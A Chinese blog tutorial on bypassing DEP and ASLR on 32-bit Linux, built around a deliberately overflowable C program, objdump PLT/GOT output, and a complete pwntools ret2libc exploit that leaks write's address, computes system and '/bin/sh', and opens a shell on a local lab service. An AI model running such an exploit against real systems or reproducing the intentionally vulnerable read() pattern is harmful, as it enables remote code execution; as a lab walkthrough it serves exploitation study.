linux栈溢出-绕过ROP、ASLR(知道libc.so)

最新推荐文章于 2024-05-21 09:33:07 发布
最新推荐文章于 2024-05-21 09:33:07 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 系统调试 文章标签: linux 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35519254/article/details/76272368
版权
调试环境是ubuntu14 32位
这次开启了DEP、ASLR,在linux x86溢出,知道libc.so文件的情况下

代码是1.c: 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function() {    
char buf[128];    
read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv) {    
vulnerable_function();    
write(STDOUT_FILENO, "Hello, World\n", 13);
}

gcc -fno-stack-protector -o 1 1.c
开启ASLR: 
sudo -s 
echo 2 > /proc/sys/kernel/randomize_va_space
exit

关键还是找到函数system和字符串的地址,但是关键是这里libc.so文件每次加载的地址是不一样的,所以不能通过硬编码的方式直接写到exploit里边去。

所以需要想办法找到一个内存泄漏的bug,然后找到system函数的地址。
这里需要堆plt和got了解一下,以及延迟绑定的知识。
通过write@plt 和write@got确定函数write的地址,这里直接借助pwntools这个工具就行了。
可以先用命令objdump -d -j .plt 1 和 objdump -R 1确定write@plt 和write@got的地址。
然后确定write函数的地址。 
yang@yang-virtual-machine:~$ objdump -d -j .plt 1 

1:     文件格式 elf32-i386


Disassembly of section .plt:

08048300 <read@plt-0x10>:
 8048300:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048306:	ff 25 08 a0 04 08    	jmp    *0x804a008
 804830c:	00 00                	add    %al,(%eax)
	...

08048310 <read@plt>:
 8048310:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048316:	68 00 00 00 00       	push   $0x0
 804831b:	e9 e0 ff ff ff       	jmp    8048300 <_init+0x30>

08048320 <__gmon_start__@plt>:
 8048320:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048326:	68 08 00 00 00       	push   $0x8
 804832b:	e9 d0 ff ff ff       	jmp    8048300 <_init+0x30>

08048330 <__libc_start_main@plt>:
 8048330:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048336:	68 10 00 00 00       	push   $0x10
 804833b:	e9 c0 ff ff ff       	jmp    8048300 <_init+0x30>

08048340 <write@plt>:
 8048340:	ff 25 18 a0 04 08    	jmp    *0x804a018
 8048346:	68 18 00 00 00       	push   $0x18
 804834b:	e9 b0 ff ff ff       	jmp    8048300 <_init+0x30>
yang@yang-virtual-machine:~$ objdump -R 1

1:     文件格式 elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ffc R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   read
0804a010 R_386_JUMP_SLOT   __gmon_start__
0804a014 R_386_JUMP_SLOT   __libc_start_main
0804a018 R_386_JUMP_SLOT   write


yang@yang-virtual-machine:~$


因为system()函数和write()在libc.so中的offset(相对地址)是不变的,在知道libc。so的情况下,就可以根据相对偏移计算出,system函数的地址。
最后exp如下: 
#!/usr/bin/env python
from pwn import *

libc = ELF('libc.so')
elf = ELF('1')

#p = process('./1')
p = remote('127.0.0.1', 10003)

plt_write = elf.symbols['write']
print 'plt_write= ' + hex(plt_write)
got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
vulfun_addr = 0x08048476
print 'vulfun= ' + hex(vulfun_addr)

payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)

print "\n###sending payload1 ...###"
p.send(payload1)

print "\n###receving write() addr...###"
write_addr = u32(p.recv(4))
print 'write_addr=' + hex(write_addr)

print "\n###calculating system() addr and \"/bin/sh\" addr...###"
system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])
print 'system_addr= ' + hex(system_addr)
binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print 'binsh_addr= ' + hex(binsh_addr)

payload2 = 'a'*140  + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)

print "\n###sending payload2 ...###"
p.send(payload2)

p.interactive()
需要注意的一点是, 这个地方vulfun_addr的值是函数main的地址,别的话可能会出错。
qq_35519254
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
总结来说,栈溢出漏洞的利用在开启NX的系统中更具挑战性,但通过ret2libc策略,攻击者仍然可以绕过这一防护。在没有ASLR的情况下,内存地址是可预测的,使得漏洞利用变得更加直接。然而,现代操作系统通常会同时启用...
linux下so动态库一些不为人知的秘密
赶路人儿
09-18 1012
linux 下有动态库和静态库,动态库以.so为扩展名,静态库以.a为扩展名。二者都使用广泛。本文主要讲动态库方面知识。 一、动态链接库依赖问题 基本上每一个linux 程序都至少会有一个动态库,查看某个程序使用了那些动态库,使用ldd命令查看 : # ldd /bin/ls linux-vdso.so.1 => (0x00007fff597ff000) libselinux.so.1 => /lib64/libselinux.so.1 (0x00000036c2e00000) libr
Linux基础 - libc.so调试版本编译
sz66cm 学习随笔
04-24 295
libc 调试版本 嵌入式自定义c库
尝试解决Linux提示:/lib64/libc.so.6: version GLIBC_2.XX‘ not found
最新发布
for__future_的博客
05-21 1328
这一步有可能报错,报错内容如下:解决办法如下:之后重新运行 这一步有可能报错,报错内容如下:
linux编译指定libc路径,【请教】libc.so的具体作用
weixin_36467992的博客
05-09 2847
知道是C动态链接库,请问具体作用是什么呢?应用程序中用到的C库函数,好像是静态链接到执行文件中的。比如:源文件m.c#includeintmain(){printf("");return0;}gccm.c-om编译后printf已经在m中了。还要libc.so做什么用呢?|这是动态库有些库实现的.c源文件就在这里面|一般为了方便升级库文件libc.so都只是一个文件链接,指向期望的版...
Linuxlibc.so.6升级
Java小技巧
10-24 3214
问题背景 1.由于开发内网需要用到node环境,引入node安装到内网 2.解压、安装、配置环境变量后发现系统GLIBC包版本过低 3.GLIBC是GUN发布的libc库,即C运行库 4.需要安装GLIBC_2.17版本 查询方案 开始解决 官网下载GLIBC-2.17包 http://ftp.gnu.org/gnu/glibc/ 根据系统版本下载对应的包类型,下载完毕上传至服务器 解压glib-2.17.tar.xz 命令: tar -xf glibc-2.17.tar.xz
linux libc.so.6软链接错误 导致ls等基础命令无法使用
whatday的专栏
04-24 4461
其原因是安装lm_sensors的时候需要安装依赖lm_sensors-libs动态库,安装完成动态库后会更新动态库的软链接,而/usr/lib64目录下存在升级遗留的glibc2.25相关动态库文件,默认软链接到最新版本,而当前最新版本未正确安装,并不能使用。在linux中是支持在程序运行时才进行so库的连接的,函数包括dlopen,dlclose,dlsym,dlerror.这几个函数的实现库就是libdl.so,所以libdl.so的工作是在程序运行时找到指定的so并连接。(需要使用LD\U预加载。
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
栈溢出是计算机安全领域中的一个重要概念,主要发生在程序运行过程中,由于栈空间分配不当,导致数据超出预定的栈帧范围,从而影响到其他栈帧中的数据,甚至可能破坏程序执行流程,造成安全风险。本篇文章将深入探讨...
SploitFun Linux x86 Exploit 开发系列教程.zip
02-10
8. **栈 Canary**:学习栈Canary的原理和它在防止栈溢出中的作用,以及如何检测和绕过Canary。 9. **ROP(返回导向编程)**:当传统的栈溢出方法被防御机制阻止时,ROP成为一种流行的利用技术。本教程会讲解如何...
栈溢出入门到放弃_19_7_211
08-08
栈溢出是一种常见的安全漏洞,通常发生在C语言或其他低级编程语言中,由于程序员未正确管理函数调用栈,导致超出预期的数据写入栈空间,从而可能篡改关键的程序控制流。本篇将深入探讨栈溢出的三种主要利用方式,...
周玉川-2017221302006-第三次作业1
08-03
ROP 是一种利用程序中的短小指令片段构造任意代码执行的技术,常用于绕过DEP(数据执行保护)。目前,有几种常见的检测方法: - **基于控制流程图(CFG)的CFI检测**:这种方法检查跳转指令的目的地址,确保它们只跳转...
linux-libc.so.6
11-06
安装守护程序的时候有时候会报错,可能缺少这个包
Linux so剖析
胡超的学习日志
05-06 2611
Linux so剖析 此处so指Shared Object,即动态链接库,本文将从so文件格式开始讲述,在了解完so文件格式的必要知识后,接下来最简概述so的生成,即编译器的静态链接,然后便是so的加载与动态链接,以及动态链接库的依赖动态链接库。 so的文件格式为ELF(Executable and Linkable Format),ELF由Unix System Laboratories开发,已经成为标准。常见的动态链接库(so), 静态库(a), 编译目标文件(o), 可执行文件, CoreDump文件
2022拟态防御pwn(bfbf)
m0_63437215的博客
11-07 457
2022拟态防御pwn
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1355
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
linux libc .so,Linux libc.so.6文件使用问题
weixin_31689491的博客
05-13 1552
libc.so.6软连接了一个错误的版本,导致ls,ll,mv命令都报错。[root@ ~]# mvmv: /lib64/libc.so.6: version `GLIBC_2.14' not found (required by /lib64/librt.so.1)mv: /lib64/libc.so.6: version `GLIBC_2.14' not found (required by ...
Linuxlibc.so.6软链接错误导致ls等基础命令无法使用
热门推荐
月生的静心苑
06-20 1万+
在yum安装了lm_sensors模块后,出现服务器ls,grep,find等全部命令无法使用的情况。其原因是安装lm_sensors的时候需要安装依赖lm_sensors-libs动态库,安装完成动态库后会更新动态库的软链接,而/usr/lib64目录下存在升级遗留的glibc2.25相关动态库文件,默认软链接到最新版本,而当前最新版本未正确安装,并不能使用。经过重建libc.so.6等文件的软链接完成了回退。处理ls、grep等基础命令无法使用的情况,请注意:保持当前ssh连接不断开,不要重启服务器!.
linux+缺少+libc.so.6,libc.so.6 缺失问题
weixin_42522045的博客
05-13 9114
今天中午,在Redhat AS5 上解决一个数据库连接问题,在应用的日志中发现如下报错信息:[error] [client 145.24.216.86] /lib/libc.so.6(__libc_start_main+0xdc)[0x4138cdec],在系统中搜索了一下,发现三个位置有libc.so.6:/home/ora10g/product/10.2.0/db_1/lib/stubs/li...
linux栈溢出4-绕过ROPASLR(不知道libc.so)
小强的博客
07-31 1168
调试环境是ubuntu14 32位 这次开启了DEP、ASLR(不知道libc.so情况下) 还是参考了《一步一步学ROPlinux_x64篇》这篇文章。 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf
二进制漏洞挖掘-栈溢出-开启NX开启ASLR1
08-04
二进制漏洞挖掘-栈溢出-开启NX开启ASLR 本文将详细介绍二进制漏洞挖掘中的栈溢出漏洞,特别是开启NX和ASLR的影响。 一、栈溢出漏洞原理 栈溢出漏洞是由于程序在对栈缓冲区进行写操作时,未对缓冲区大小进行判断,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值